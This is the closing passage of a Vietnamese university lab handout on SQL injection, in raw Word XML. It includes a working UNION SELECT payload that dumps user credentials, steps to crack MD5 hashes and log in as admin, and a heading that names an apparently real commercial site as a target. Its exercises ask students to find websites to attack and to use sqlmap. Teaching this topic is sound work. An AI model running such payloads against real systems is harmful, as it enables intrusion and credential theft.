        <w:t>http://www.tototo.com/?frame=product_detail&amp;id=NULL UNION SELECT 1,2,group_concat(id,0x3a,uid,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16 FROM tbl_user--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6D3775" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="00F9409C">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>[0x3a là dấu : , ta thêm vào để dễ nhìn ra khoảng cách giữa id, tên user và password]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F54A9C" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="00F9409C">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Dựa vào kết quả, ta có được tên tài khoản và mật khẩu được mã hóa theo MD5 tương ứng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613C2AF8" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Bước 8: Bẻ khóa mật khẩu MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C49664D" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="00F9409C">
      <w:pPr>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Vào trang web  </w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>https://www.md5online.org/</w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve"> hoặc  </w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>https://hashkiller.co.uk/md5-decrypter.aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5321994B" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Bước 9: Đăng nhập hệ thống với tài khoản vừa lấy được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B02A8DD" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t> http://www.tototo.com/home/admin/login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B228BD5" w14:textId="7CEFBCDE" w:rsidR="492045D4" w:rsidRPr="008A1FD0" w:rsidRDefault="492045D4" w:rsidP="57CBC74E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc175586999"/>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve">Tấn công Website </w:t>
      </w:r>
      <w:r w:rsidR="009E2153" w:rsidRPr="008A1FD0">
        <w:t>https://nhuaphucthinh.com.vn/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="7A7AE747" w14:textId="6AB5074B" w:rsidR="492045D4" w:rsidRPr="008A1FD0" w:rsidRDefault="492045D4" w:rsidP="00D86FF1">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>https://thudinh.blogspot.com/2017/06/how-to-attack-sql-injection-website.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B09CC59" w14:textId="16AF66B9" w:rsidR="007E5344" w:rsidRPr="008A1FD0" w:rsidRDefault="009E2153" w:rsidP="57CBC74E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc175587000"/>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve">Tấn công các Website </w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>wandertour</w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>.ddns.net:8282</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="44DB196D" w14:textId="77DF5F2C" w:rsidR="007E5344" w:rsidRPr="008A1FD0" w:rsidRDefault="007E5344" w:rsidP="69DCF625">
      <w:pPr>
        <w:ind w:left="284" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve">Truy cập   </w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="6F3106DA" w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>wandertour</w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.ddns.net:</w:t>
      </w:r>
      <w:r w:rsidR="412CC248" w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8282</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246B4E08" w14:textId="4E5718E2" w:rsidR="007E5344" w:rsidRPr="008A1FD0" w:rsidRDefault="007E5344" w:rsidP="00FB5FE5">
      <w:pPr>
        <w:ind w:left="284" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve">Lần lượt thực hiện các nội dung khai thác lổ hổng </w:t>
      </w:r>
      <w:r w:rsidR="00BF02A7" w:rsidRPr="008A1FD0">
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve"> như sau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5974A7ED" w14:textId="77777777" w:rsidR="00E82AF6" w:rsidRPr="008A1FD0" w:rsidRDefault="00E82AF6" w:rsidP="00E82AF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Website quảng bá du lịch Công ty HAVACO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18991EDA" w14:textId="77777777" w:rsidR="00E82AF6" w:rsidRPr="008A1FD0" w:rsidRDefault="00E82AF6" w:rsidP="00E82AF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Website giới thiệu mẫu thời trang Công ty MODELCO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3FFA9A" w14:textId="1D95868A" w:rsidR="00E82AF6" w:rsidRPr="008A1FD0" w:rsidRDefault="00E82AF6" w:rsidP="00E82AF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Website quản lý sinh viên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B8C6FD" w14:textId="1103B354" w:rsidR="00E82AF6" w:rsidRPr="008A1FD0" w:rsidRDefault="00E82AF6" w:rsidP="00E82AF6">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve">Chú ý: </w:t>
      </w:r>
      <w:r w:rsidR="00856A03" w:rsidRPr="008A1FD0">
        <w:t>Lần lượt t</w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve">hay www.tototo.com.vn bằng </w:t>
      </w:r>
      <w:r w:rsidR="00856A03" w:rsidRPr="008A1FD0">
        <w:t>các địa chỉ sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B807D7F" w14:textId="59FD55C8" w:rsidR="00856A03" w:rsidRPr="008A1FD0" w:rsidRDefault="558AB511" w:rsidP="4C3ADA38">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="63B2D126" w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>wandertour</w:t>
      </w:r>
      <w:r w:rsidR="00856A03" w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.ddns.net:</w:t>
      </w:r>
      <w:r w:rsidR="638299A5" w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="412CC248" w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>8282</w:t>
      </w:r>
      <w:r w:rsidR="00856A03" w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/qldulich/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5B4B21" w14:textId="7A0D8714" w:rsidR="00856A03" w:rsidRPr="008A1FD0" w:rsidRDefault="5BEC0675" w:rsidP="4C3ADA38">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="0A0845CC" w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>wandertour</w:t>
      </w:r>
      <w:r w:rsidR="00856A03" w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.ddns.net:</w:t>
      </w:r>
      <w:r w:rsidR="412CC248" w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>8282</w:t>
      </w:r>
      <w:r w:rsidR="00856A03" w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/qlthoitrang/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BA7D21" w14:textId="2EB42BFA" w:rsidR="00856A03" w:rsidRPr="008A1FD0" w:rsidRDefault="2DC5D576" w:rsidP="4C3ADA38">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="5EE694BF" w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>wandertour</w:t>
      </w:r>
      <w:r w:rsidR="00856A03" w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.ddns.net:</w:t>
      </w:r>
      <w:r w:rsidR="412CC248" w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>8282</w:t>
      </w:r>
      <w:r w:rsidR="00856A03" w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/qlsinhvien/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2A409D" w14:textId="355085DC" w:rsidR="0031772F" w:rsidRPr="008A1FD0" w:rsidRDefault="008D066D" w:rsidP="69DCF625">
      <w:pPr>
        <w:pStyle w:val="txtHinhVe"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D2C1C51" wp14:editId="3BEFA36D">
            <wp:extent cx="5106291" cy="4045025"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="27522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291" cy="40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4FF9" w14:textId="65F2524F" w:rsidR="008D066D" w:rsidRPr="008A1FD0" w:rsidRDefault="00D83595" w:rsidP="69DCF625">
      <w:pPr>
        <w:pStyle w:val="txtHinhVe"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C4C955D" wp14:editId="0B7E5A20">
            <wp:extent cx="5061368" cy="4009437"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1637132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68" cy="40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3AB3" w14:textId="16AC1E8C" w:rsidR="00A03B9B" w:rsidRPr="008A1FD0" w:rsidRDefault="00A03B9B" w:rsidP="69DCF625">
      <w:pPr>
        <w:pStyle w:val="txtHinhVe"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="641CAF75" wp14:editId="4BFB95A4">
            <wp:extent cx="5010828" cy="3969402"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="344119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28" cy="39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BB93" w14:textId="77777777" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="0031173D" w:rsidP="00CF1959">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc19092641"/>
      <w:bookmarkStart w:id="8" w:name="_Toc175587001"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>BÀI TẬP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="782DA57F" w14:textId="6928DA6C" w:rsidR="00B0789F" w:rsidRPr="008A1FD0" w:rsidRDefault="001E77E8" w:rsidP="001E77E8">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve">Thực hiện tìm kiếm một số trang Web </w:t>
      </w:r>
      <w:r w:rsidR="0031772F" w:rsidRPr="008A1FD0">
        <w:t>để tấn công SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250DED08" w14:textId="7C7FCD1B" w:rsidR="0031772F" w:rsidRPr="008A1FD0" w:rsidRDefault="0031772F" w:rsidP="001E77E8">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Sử dụng lệnh sqlmap trên Kali Linux để tấn công SQl Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3804E52A" w14:textId="77777777" w:rsidR="00A03B9B" w:rsidRPr="008A1FD0" w:rsidRDefault="00A03B9B" w:rsidP="00A03B9B">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:left="284" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56BE8A4F" w14:textId="07A68C2D" w:rsidR="00A03B9B" w:rsidRPr="008A1FD0" w:rsidRDefault="00A03B9B" w:rsidP="00A03B9B">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Tài liệu lưu hành nội bộ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E69325" w14:textId="77777777" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="0031173D">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>-----------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA7DBDE" w14:textId="77777777" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="00816F7F"/>
    <w:p w14:paraId="05AA9CEF" w14:textId="77777777" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="00816F7F">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D5322A9" w14:textId="77777777" w:rsidR="00816F7F" w:rsidRDefault="00816F7F"/>
    <w:sectPr w:rsidR="00816F7F">
      <w:headerReference w:type="default" r:id="rId11"/>
      <w:footerReference w:type="default" r:id="rId12"/>
      <w:pgSz w:w="11907" w:h="16840"/>
      <w:pgMar w:top="1134" w:right="1134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29393" w14:textId="77777777" w:rsidR="004255A0" w:rsidRPr="008A1FD0" w:rsidRDefault="004255A0">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7EF48041" w14:textId="77777777" w:rsidR="004255A0" w:rsidRPr="008A1FD0" w:rsidRDefault="004255A0">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="04AD18D1" w14:textId="77777777" w:rsidR="004255A0" w:rsidRPr="008A1FD0" w:rsidRDefault="004255A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06153515"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="5E0605A0" w14:textId="112C528B" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="69DCF625">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:tabs>
            <w:tab w:val="right" w:pos="9639"/>
          </w:tabs>
          <w:ind w:firstLine="0"/>
        </w:pPr>
        <w:r w:rsidRPr="008A1FD0">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
          </w:rPr>
          <w:t>KhoaCNTT-Trường ĐHBK, ĐHĐN</w:t>
        </w:r>
        <w:r w:rsidR="0068458D" w:rsidRPr="008A1FD0">
          <w:tab/>
        </w:r>
        <w:r w:rsidR="0068458D" w:rsidRPr="008A1FD0">
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="0068458D" w:rsidRPr="008A1FD0">
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r w:rsidR="0068458D" w:rsidRPr="008A1FD0">
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="008A1FD0">
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="0068458D" w:rsidRPr="008A1FD0">
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="2812C26A" w14:textId="77777777" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="00816F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B947D" w14:textId="77777777" w:rsidR="004255A0" w:rsidRPr="008A1FD0" w:rsidRDefault="004255A0">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4DE5D9CD" w14:textId="77777777" w:rsidR="004255A0" w:rsidRPr="008A1FD0" w:rsidRDefault="004255A0">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="31AFEBF8" w14:textId="77777777" w:rsidR="004255A0" w:rsidRPr="008A1FD0" w:rsidRDefault="004255A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619062" w14:textId="5B930126" w:rsidR="00620047" w:rsidRPr="008A1FD0" w:rsidRDefault="00620047">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r w:rsidRPr="008A1FD0">
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="319FE50C" wp14:editId="16CF244A">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>6013450</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-139700</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="241200" cy="241200"/>
          <wp:effectExtent l="0" t="0" r="6985" b="6985"/>
          <wp:wrapNone/>
          <wp:docPr id="629311327" name="Picture 629311327" descr="A logo with arrows and a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9311327" name="Picture 1" descr="A logo with arrows and a black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1200" cy="24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9CA02F0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FCA9F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8549D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43A5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BE2E44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A03B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C2401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F0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68E65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A7ADD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3E70C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6918235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43A32C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDEE51F0"/>
    <w:lvl w:ilvl="0" w:tplc="E4588E52">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="txtGachDong"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="721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E0EED78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97CA0D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3DC1C98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454B36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F3AB7AA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4DEDC2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73425E6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5662787A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18C2022D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="287476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8F5668"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B656AC5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0916823"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD303A6C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33A747D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="47C0E75C"/>
    <w:lvl w:ilvl="0" w:tplc="4C5A9F02">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="txtTaiLieuThamKhao"/>
      <w:lvlText w:val="[%1]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22280D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B104A0A"/>
    <w:lvl w:ilvl="0" w:tplc="EC1EB9BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="txtHoaThi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56E4576"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3BF20CC0"/>
    <w:lvl w:ilvl="0" w:tplc="EDDEF07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50209160">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="7413664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7732704">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="597523637">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="3279033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882469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99803317">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="158235612">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="74205970">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1180511202">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1029720251">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1840654357">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1453672486">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="481041163">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="870804331">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1012342041">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="2119062576">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="2128347268">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2053965739">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="363138625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58"/>
    <w:rsid w:val="00026A7D"/>
    <w:rsid w:val="00044491"/>
    <w:rsid w:val="000B272E"/>
    <w:rsid w:val="001001AD"/>
    <w:rsid w:val="00130F60"/>
    <w:rsid w:val="001631F0"/>
    <w:rsid w:val="001E77E8"/>
    <w:rsid w:val="00242AC9"/>
    <w:rsid w:val="00287A8A"/>
    <w:rsid w:val="0031173D"/>
    <w:rsid w:val="0031772F"/>
    <w:rsid w:val="00393949"/>
    <w:rsid w:val="0042111E"/>
    <w:rsid w:val="004255A0"/>
    <w:rsid w:val="004A5938"/>
    <w:rsid w:val="004C4587"/>
    <w:rsid w:val="004E4C7A"/>
    <w:rsid w:val="005332E8"/>
    <w:rsid w:val="006030B3"/>
    <w:rsid w:val="006129AB"/>
    <w:rsid w:val="00620047"/>
    <w:rsid w:val="00621B68"/>
    <w:rsid w:val="006557BB"/>
    <w:rsid w:val="0068458D"/>
    <w:rsid w:val="006913CF"/>
    <w:rsid w:val="007136BE"/>
    <w:rsid w:val="00725E88"/>
    <w:rsid w:val="007466A3"/>
    <w:rsid w:val="0075075D"/>
    <w:rsid w:val="0075591E"/>
    <w:rsid w:val="007E5344"/>
    <w:rsid w:val="00804A96"/>
    <w:rsid w:val="00816F7F"/>
    <w:rsid w:val="008459D0"/>
    <w:rsid w:val="008463C9"/>
    <w:rsid w:val="00856A03"/>
    <w:rsid w:val="00862A38"/>
    <w:rsid w:val="00867106"/>
    <w:rsid w:val="008A1FD0"/>
    <w:rsid w:val="008A4715"/>
    <w:rsid w:val="008B29EF"/>
    <w:rsid w:val="008B577A"/>
    <w:rsid w:val="008D066D"/>
    <w:rsid w:val="009A62F3"/>
    <w:rsid w:val="009E2153"/>
    <w:rsid w:val="009E3993"/>
